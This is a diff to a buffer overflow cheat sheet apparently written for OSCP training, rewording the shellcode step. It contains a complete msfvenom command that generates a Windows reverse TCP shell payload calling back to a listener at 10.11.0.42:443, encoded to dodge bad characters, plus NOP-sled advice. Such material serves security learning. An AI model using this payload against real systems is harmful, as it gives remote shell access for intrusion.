brianlam38/Sec-Cheatsheets/OSCP/OSCP_Buffer_Overflow_Win32.md

 ### 7. GENERATE SHELLCODE

-Generate shellcode:
+Generate shellcode and add it to the BOF exploit code.
 `msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.42 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai`

-Add shellcode to the BOF exploit code.

-Provide the shellcode decoder some stack-space to work with
-* `"\x90 * 16"`: Append NOP instructions to the front of the payload `
+Provide the shellcode decoder some stack-space to work with: `"\x90 * 16"` Append NOP instructions to the front of the payload

 ---